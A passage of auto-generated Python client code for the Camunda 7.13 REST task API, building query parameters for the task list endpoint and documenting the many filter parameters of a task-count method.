query_params.append(('assigned', local_var_params['assigned'])) # noqa: E501
if 'unassigned' in local_var_params and local_var_params['unassigned'] is not None: # noqa: E501
query_params.append(('unassigned', local_var_params['unassigned'])) # noqa: E501
if 'task_definition_key' in local_var_params and local_var_params['task_definition_key'] is not None: # noqa: E501
query_params.append(('taskDefinitionKey', local_var_params['task_definition_key'])) # noqa: E501
if 'task_definition_key_in' in local_var_params and local_var_params['task_definition_key_in'] is not None: # noqa: E501
query_params.append(('taskDefinitionKeyIn', local_var_params['task_definition_key_in'])) # noqa: E501
if 'task_definition_key_like' in local_var_params and local_var_params['task_definition_key_like'] is not None: # noqa: E501
query_params.append(('taskDefinitionKeyLike', local_var_params['task_definition_key_like'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'name_not_equal' in local_var_params and local_var_params['name_not_equal'] is not None: # noqa: E501
query_params.append(('nameNotEqual', local_var_params['name_not_equal'])) # noqa: E501
if 'name_like' in local_var_params and local_var_params['name_like'] is not None: # noqa: E501
query_params.append(('nameLike', local_var_params['name_like'])) # noqa: E501
if 'name_not_like' in local_var_params and local_var_params['name_not_like'] is not None: # noqa: E501
query_params.append(('nameNotLike', local_var_params['name_not_like'])) # noqa: E501
if 'description' in local_var_params and local_var_params['description'] is not None: # noqa: E501
query_params.append(('description', local_var_params['description'])) # noqa: E501
if 'description_like' in local_var_params and local_var_params['description_like'] is not None: # noqa: E501
query_params.append(('descriptionLike', local_var_params['description_like'])) # noqa: E501
if 'priority' in local_var_params and local_var_params['priority'] is not None: # noqa: E501
query_params.append(('priority', local_var_params['priority'])) # noqa: E501
if 'max_priority' in local_var_params and local_var_params['max_priority'] is not None: # noqa: E501
query_params.append(('maxPriority', local_var_params['max_priority'])) # noqa: E501
if 'min_priority' in local_var_params and local_var_params['min_priority'] is not None: # noqa: E501
query_params.append(('minPriority', local_var_params['min_priority'])) # noqa: E501
if 'due_date' in local_var_params and local_var_params['due_date'] is not None: # noqa: E501
query_params.append(('dueDate', local_var_params['due_date'])) # noqa: E501
if 'due_date_expression' in local_var_params and local_var_params['due_date_expression'] is not None: # noqa: E501
query_params.append(('dueDateExpression', local_var_params['due_date_expression'])) # noqa: E501
if 'due_after' in local_var_params and local_var_params['due_after'] is not None: # noqa: E501
query_params.append(('dueAfter', local_var_params['due_after'])) # noqa: E501
if 'due_after_expression' in local_var_params and local_var_params['due_after_expression'] is not None: # noqa: E501
query_params.append(('dueAfterExpression', local_var_params['due_after_expression'])) # noqa: E501
if 'due_before' in local_var_params and local_var_params['due_before'] is not None: # noqa: E501
query_params.append(('dueBefore', local_var_params['due_before'])) # noqa: E501
if 'due_before_expression' in local_var_params and local_var_params['due_before_expression'] is not None: # noqa: E501
query_params.append(('dueBeforeExpression', local_var_params['due_before_expression'])) # noqa: E501
if 'follow_up_date' in local_var_params and local_var_params['follow_up_date'] is not None: # noqa: E501
query_params.append(('followUpDate', local_var_params['follow_up_date'])) # noqa: E501
if 'follow_up_date_expression' in local_var_params and local_var_params['follow_up_date_expression'] is not None: # noqa: E501
query_params.append(('followUpDateExpression', local_var_params['follow_up_date_expression'])) # noqa: E501
if 'follow_up_after' in local_var_params and local_var_params['follow_up_after'] is not None: # noqa: E501
query_params.append(('followUpAfter', local_var_params['follow_up_after'])) # noqa: E501
if 'follow_up_after_expression' in local_var_params and local_var_params['follow_up_after_expression'] is not None: # noqa: E501
query_params.append(('followUpAfterExpression', local_var_params['follow_up_after_expression'])) # noqa: E501
if 'follow_up_before' in local_var_params and local_var_params['follow_up_before'] is not None: # noqa: E501
query_params.append(('followUpBefore', local_var_params['follow_up_before'])) # noqa: E501
if 'follow_up_before_expression' in local_var_params and local_var_params['follow_up_before_expression'] is not None: # noqa: E501
query_params.append(('followUpBeforeExpression', local_var_params['follow_up_before_expression'])) # noqa: E501
if 'follow_up_before_or_not_existent' in local_var_params and local_var_params['follow_up_before_or_not_existent'] is not None: # noqa: E501
query_params.append(('followUpBeforeOrNotExistent', local_var_params['follow_up_before_or_not_existent'])) # noqa: E501
if 'follow_up_before_or_not_existent_expression' in local_var_params and local_var_params['follow_up_before_or_not_existent_expression'] is not None: # noqa: E501
query_params.append(('followUpBeforeOrNotExistentExpression', local_var_params['follow_up_before_or_not_existent_expression'])) # noqa: E501
if 'created_on' in local_var_params and local_var_params['created_on'] is not None: # noqa: E501
query_params.append(('createdOn', local_var_params['created_on'])) # noqa: E501
if 'created_on_expression' in local_var_params and local_var_params['created_on_expression'] is not None: # noqa: E501
query_params.append(('createdOnExpression', local_var_params['created_on_expression'])) # noqa: E501
if 'created_after' in local_var_params and local_var_params['created_after'] is not None: # noqa: E501
query_params.append(('createdAfter', local_var_params['created_after'])) # noqa: E501
if 'created_after_expression' in local_var_params and local_var_params['created_after_expression'] is not None: # noqa: E501
query_params.append(('createdAfterExpression', local_var_params['created_after_expression'])) # noqa: E501
if 'created_before' in local_var_params and local_var_params['created_before'] is not None: # noqa: E501
query_params.append(('createdBefore', local_var_params['created_before'])) # noqa: E501
if 'created_before_expression' in local_var_params and local_var_params['created_before_expression'] is not None: # noqa: E501
query_params.append(('createdBeforeExpression', local_var_params['created_before_expression'])) # noqa: E501
if 'delegation_state' in local_var_params and local_var_params['delegation_state'] is not None: # noqa: E501
query_params.append(('delegationState', local_var_params['delegation_state'])) # noqa: E501
if 'candidate_groups' in local_var_params and local_var_params['candidate_groups'] is not None: # noqa: E501
query_params.append(('candidateGroups', local_var_params['candidate_groups'])) # noqa: E501
if 'candidate_groups_expression' in local_var_params and local_var_params['candidate_groups_expression'] is not None: # noqa: E501
query_params.append(('candidateGroupsExpression', local_var_params['candidate_groups_expression'])) # noqa: E501
if 'with_candidate_groups' in local_var_params and local_var_params['with_candidate_groups'] is not None: # noqa: E501
query_params.append(('withCandidateGroups', local_var_params['with_candidate_groups'])) # noqa: E501
if 'without_candidate_groups' in local_var_params and local_var_params['without_candidate_groups'] is not None: # noqa: E501
query_params.append(('withoutCandidateGroups', local_var_params['without_candidate_groups'])) # noqa: E501
if 'with_candidate_users' in local_var_params and local_var_params['with_candidate_users'] is not None: # noqa: E501
query_params.append(('withCandidateUsers', local_var_params['with_candidate_users'])) # noqa: E501
if 'without_candidate_users' in local_var_params and local_var_params['without_candidate_users'] is not None: # noqa: E501
query_params.append(('withoutCandidateUsers', local_var_params['without_candidate_users'])) # noqa: E501
if 'active' in local_var_params and local_var_params['active'] is not None: # noqa: E501
query_params.append(('active', local_var_params['active'])) # noqa: E501
if 'suspended' in local_var_params and local_var_params['suspended'] is not None: # noqa: E501
query_params.append(('suspended', local_var_params['suspended'])) # noqa: E501
if 'task_variables' in local_var_params and local_var_params['task_variables'] is not None: # noqa: E501
query_params.append(('taskVariables', local_var_params['task_variables'])) # noqa: E501
if 'process_variables' in local_var_params and local_var_params['process_variables'] is not None: # noqa: E501
query_params.append(('processVariables', local_var_params['process_variables'])) # noqa: E501
if 'case_instance_variables' in local_var_params and local_var_params['case_instance_variables'] is not None: # noqa: E501
query_params.append(('caseInstanceVariables', local_var_params['case_instance_variables'])) # noqa: E501
if 'variable_names_ignore_case' in local_var_params and local_var_params['variable_names_ignore_case'] is not None: # noqa: E501
query_params.append(('variableNamesIgnoreCase', local_var_params['variable_names_ignore_case'])) # noqa: E501
if 'variable_values_ignore_case' in local_var_params and local_var_params['variable_values_ignore_case'] is not None: # noqa: E501
query_params.append(('variableValuesIgnoreCase', local_var_params['variable_values_ignore_case'])) # noqa: E501
if 'parent_task_id' in local_var_params and local_var_params['parent_task_id'] is not None: # noqa: E501
query_params.append(('parentTaskId', local_var_params['parent_task_id'])) # noqa: E501
if 'sort_by' in local_var_params and local_var_params['sort_by'] is not None: # noqa: E501
query_params.append(('sortBy', local_var_params['sort_by'])) # noqa: E501
if 'sort_order' in local_var_params and local_var_params['sort_order'] is not None: # noqa: E501
query_params.append(('sortOrder', local_var_params['sort_order'])) # noqa: E501
if 'first_result' in local_var_params and local_var_params['first_result'] is not None: # noqa: E501
query_params.append(('firstResult', local_var_params['first_result'])) # noqa: E501
if 'max_results' in local_var_params and local_var_params['max_results'] is not None: # noqa: E501
query_params.append(('maxResults', local_var_params['max_results'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TaskDto]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_tasks_count(self, **kwargs): # noqa: E501
"""get_tasks_count # noqa: E501
Retrieves the number of tasks that fulfill a provided filter. Corresponds to the size of the result set when using the [Get Tasks](https://docs.camunda.org/manual/7.13/reference/rest/task/) method. **Security Consideration:** There are several query parameters (such as assigneeExpression) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) for custom code in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tasks_count(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str process_instance_id: Restrict to tasks that belong to process instances with the given id.
:param str process_instance_id_in: Restrict to tasks that belong to process instances with the given ids.
:param str process_instance_business_key: Restrict to tasks that belong to process instances with the given business key.
:param str process_instance_business_key_expression: Restrict to tasks that belong to process instances with the given business key which is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_instance_business_key_in: Restrict to tasks that belong to process instances with one of the give business keys. The keys need to be in a comma-separated list.
:param str process_instance_business_key_like: Restrict to tasks that have a process instance business key that has the parameter value as a substring.
:param str process_instance_business_key_like_expression: Restrict to tasks that have a process instance business key that has the parameter value as a substring and is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_definition_id: Restrict to tasks that belong to a process definition with the given id.
:param str process_definition_key: Restrict to tasks that belong to a process definition with the given key.
:param str process_definition_key_in: Restrict to tasks that belong to a process definition with one of the given keys. The keys need to be in a comma-separated list.
:param str process_definition_name: Restrict to tasks that belong to a process definition with the given name.
:param str process_definition_name_like: Restrict to tasks that have a process definition name that has the parameter value as a substring.
:param str execution_id: Restrict to tasks that belong to an execution with the given id.
:param str case_instance_id: Restrict to tasks that belong to case instances with the given id.
:param str case_instance_business_key: Restrict to tasks that belong to case instances with the given business key.
:param str case_instance_business_key_like: Restrict to tasks that have a case instance business key that has the parameter value as a substring.
:param str case_definition_id: Restrict to tasks that belong to a case definition with the given id.
:param str case_definition_key: Restrict to tasks that belong to a case definition with the given key.
:param str case_definition_name: Restrict to tasks that belong to a case definition with the given name.
:param str case_definition_name_like: Restrict to tasks that have a case definition name that has the parameter value as a substring.
:param str case_execution_id: Restrict to tasks that belong to a case execution with the given id.
:param str activity_instance_id_in: Only include tasks which belong to one of the passed and comma-separated activity instance ids.
:param str tenant_id_in: Only include tasks which belong to one of the passed and comma-separated tenant ids.
:param bool without_tenant_id: Only include tasks which belong to no tenant. Value may only be `true`, as `false` is the default behavior.
:param str assignee: Restrict to tasks that the given user is assigned to.
:param str assignee_expression: Restrict to tasks that the user described by the given expression is assigned to. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_like: Restrict to tasks that have an assignee that has the parameter value as a substring.
:param str assignee_like_expression: Restrict to tasks that have an assignee that has the parameter value described by the given expression as a substring. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_in: Only include tasks which are assigned to one of the passed and comma-separated user ids.
:param str owner: Restrict to tasks that the given user owns.
:param str owner_expression: Restrict to tasks that the user described by the given expression owns. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_group: Only include tasks that are offered to the given group.
:param str candidate_group_expression: Only include tasks that are offered to the group described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_user: Only include tasks that are offered to the given user or to one of his groups.
:param str candidate_user_expression: Only include tasks that are offered to the user described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool include_assigned_tasks: Also include tasks that are assigned to users in candidate queries. Default is to only include tasks that are not assigned to any user if you query by candidate user or group(s).
:param str involved_user: Only include tasks that the given user is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee).
:param str involved_user_expression: Only include tasks that the user described by the given expression is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee). See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool assigned: If set to `true`, restricts the query to all tasks that are assigned.
:param bool unassigned: If set to `true`, restricts the query to all tasks that are unassigned.
:param str task_definition_key: Restrict to tasks that have the given key.
:param str task_definition_key_in: Restrict to tasks that have one of the given keys. The keys need to be in a comma-separated list.
:param str task_definition_key_like: Restrict to tasks that have a key that has the parameter value as a substring.
:param str name: Restrict to tasks that have the given name.
:param str name_not_equal: Restrict to tasks that do not have the given name.
:param str name_like: Restrict to tasks that have a name with the given parameter value as substring.
:param str name_not_like: Restrict to tasks that do not have a name with the given parameter value as substring.
:param str description: Restrict to tasks that have the given description.
:param str description_like: Restrict to tasks that have a description that has the parameter value as a substring.
:param int priority: Restrict to tasks that have the given priority.
:param int max_priority: Restrict to tasks that have a lower or equal priority.
:param int min_priority: Restrict to tasks that have a higher or equal priority.
:param str due_date: Restrict to tasks that are due on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.546+0200`.
:param str due_date_expression: Restrict to tasks that are due on the date described by the given expression. See the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_after: Restrict to tasks that are due after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.435+0200`.
:param str due_after_expression: Restrict to tasks that are due after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_before: Restrict to tasks that are due before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.243+0200`.
:param str due_before_expression: Restrict to tasks that are due before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_date: Restrict to tasks that have a followUp date on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str follow_up_date_expression: Restrict to tasks that have a followUp date on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_after: Restrict to tasks that have a followUp date after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.542+0200`.
:param str follow_up_after_expression: Restrict to tasks that have a followUp date after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before: Restrict to tasks that have a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.234+0200`.
:param str follow_up_before_expression: Restrict to tasks that have a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before_or_not_existent: Restrict to tasks that have no followUp date or a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.432+0200`. The typical use case is to query all `active` tasks for a user for a given date.
:param str follow_up_before_or_not_existent_expression: Restrict to tasks that have no followUp date or a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_on: Restrict to tasks that were created on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.324+0200`.
:param str created_on_expression: Restrict to tasks that were created on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_after: Restrict to tasks that were created after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str created_after_expression: Restrict to tasks that were created after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_before: Restrict to tasks that were created before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.332+0200`.
:param str created_before_expression: Restrict to tasks that were created before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str delegation_state: Restrict to tasks that are in the given delegation state. Valid values are `PENDING` and `RESOLVED`.
:param str candidate_groups: Restrict to tasks that are offered to any of the given candidate groups. Takes a comma-separated list of group names, so for example `developers,support,sales`.
:param str candidate_groups_expression: Restrict to tasks that are offered to any of the candidate groups described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to `java.util.List` of Strings.
:param bool with_candidate_groups: Only include tasks which have a candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_groups: Only include tasks which have no candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool with_candidate_users: Only include tasks which have a candidate user. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_users: Only include tasks which have no candidate users. Value may only be `true`, as `false` is the default behavior.
:param bool active: Only include active tasks. Value may only be `true`, as `false` is the default behavior.
:param bool suspended: Only include suspended tasks. Value may only be `true`, as `false` is the default behavior.
:param str task_variables: Only include tasks that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str process_variables: Only include tasks that belong to process instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str case_instance_variables: Only include tasks that belong to case instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param bool variable_names_ignore_case: Match all variable names in this query case-insensitively. If set `variableName` and `variablename` are treated as equal.
:param bool variable_values_ignore_case: Match all variable values in this query case-insensitively. If set `variableValue` and `variablevalue` are treated as equal.
:param str parent_task_id: Restrict query to all tasks that are sub tasks of the given task. Takes a task id.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CountResultDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tasks_count_with_http_info(**kwargs) # noqa: E501
def get_tasks_count_with_http_info(self, **kwargs): # noqa: E501
"""get_tasks_count # noqa: E501
Retrieves the number of tasks that fulfill a provided filter. Corresponds to the size of the result set when using the [Get Tasks](https://docs.camunda.org/manual/7.13/reference/rest/task/) method. **Security Consideration:** There are several query parameters (such as assigneeExpression) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) for custom code in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tasks_count_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str process_instance_id: Restrict to tasks that belong to process instances with the given id.
:param str process_instance_id_in: Restrict to tasks that belong to process instances with the given ids.
:param str process_instance_business_key: Restrict to tasks that belong to process instances with the given business key.
:param str process_instance_business_key_expression: Restrict to tasks that belong to process instances with the given business key which is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_instance_business_key_in: Restrict to tasks that belong to process instances with one of the give business keys. The keys need to be in a comma-separated list.
:param str process_instance_business_key_like: Restrict to tasks that have a process instance business key that has the parameter value as a substring.
:param str process_instance_business_key_like_expression: Restrict to tasks that have a process instance business key that has the parameter value as a substring and is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_definition_id: Restrict to tasks that belong to a process definition with the given id.
:param str process_definition_key: Restrict to tasks that belong to a process definition with the given key.
:param str process_definition_key_in: Restrict to tasks that belong to a process definition with one of the given keys. The keys need to be in a comma-separated list.
:param str process_definition_name: Restrict to tasks that belong to a process definition with the given name.
:param str process_definition_name_like: Restrict to tasks that have a process definition name that has the parameter value as a substring.
:param str execution_id: Restrict to tasks that belong to an execution with the given id.
:param str case_instance_id: Restrict to tasks that belong to case instances with the given id.
:param str case_instance_business_key: Restrict to tasks that belong to case instances with the given business key.
:param str case_instance_business_key_like: Restrict to tasks that have a case instance business key that has the parameter value as a substring.
:param str case_definition_id: Restrict to tasks that belong to a case definition with the given id.
:param str case_definition_key: Restrict to tasks that belong to a case definition with the given key.
:param str case_definition_name: Restrict to tasks that belong to a case definition with the given name.
:param str case_definition_name_like: Restrict to tasks that have a case definition name that has the parameter value as a substring.
:param str case_execution_id: Restrict to tasks that belong to a case execution with the given id.
:param str activity_instance_id_in: Only include tasks which belong to one of the passed and comma-separated activity instance ids.
:param str tenant_id_in: Only include tasks which belong to one of the passed and comma-separated tenant ids.
:param bool without_tenant_id: Only include tasks which belong to no tenant. Value may only be `true`, as `false` is the default behavior.
:param str assignee: Restrict to tasks that the given user is assigned to.
:param str assignee_expression: Restrict to tasks that the user described by the given expression is assigned to. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_like: Restrict to tasks that have an assignee that has the parameter value as a substring.
:param str assignee_like_expression: Restrict to tasks that have an assignee that has the parameter value described by the given expression as a substring. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_in: Only include tasks which are assigned to one of the passed and comma-separated user ids.
:param str owner: Restrict to tasks that the given user owns.
:param str owner_expression: Restrict to tasks that the user described by the given expression owns. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_group: Only include tasks that are offered to the given group.
:param str candidate_group_expression: Only include tasks that are offered to the group described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_user: Only include tasks that are offered to the given user or to one of his groups.
:param str candidate_user_expression: Only include tasks that are offered to the user described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool include_assigned_tasks: Also include tasks that are assigned to users in candidate queries. Default is to only include tasks that are not assigned to any user if you query by candidate user or group(s).
:param str involved_user: Only include tasks that the given user is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee).
:param str involved_user_expression: Only include tasks that the user described by the given expression is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee). See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool assigned: If set to `true`, restricts the query to all tasks that are assigned.
:param bool unassigned: If set to `true`, restricts the query to all tasks that are unassigned.
:param str task_definition_key: Restrict to tasks that have the given key.
:param str task_definition_key_in: Restrict to tasks that have one of the given keys. The keys need to be in a comma-separated list.
:param str task_definition_key_like: Restrict to tasks that have a key that has the parameter value as a substring.
:param str name: Restrict to tasks that have the given name.
:param str name_not_equal: Restrict to tasks that do not have the given name.
:param str name_like: Restrict to tasks that have a name with the given parameter value as substring.
:param str name_not_like: Restrict to tasks that do not have a name with the given parameter value as substring.
:param str description: Restrict to tasks that have the given description.
:param str description_like: Restrict to tasks that have a description that has the parameter value as a substring.
:param int priority: Restrict to tasks that have the given priority.
:param int max_priority: Restrict to tasks that have a lower or equal priority.
:param int min_priority: Restrict to tasks that have a higher or equal priority.
:param str due_date: Restrict to tasks that are due on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.546+0200`.
:param str due_date_expression: Restrict to tasks that are due on the date described by the given expression. See the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_after: Restrict to tasks that are due after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.435+0200`.
:param str due_after_expression: Restrict to tasks that are due after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_before: Restrict to tasks that are due before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.243+0200`.
:param str due_before_expression: Restrict to tasks that are due before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_date: Restrict to tasks that have a followUp date on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str follow_up_date_expression: Restrict to tasks that have a followUp date on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_after: Restrict to tasks that have a followUp date after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.542+0200`.
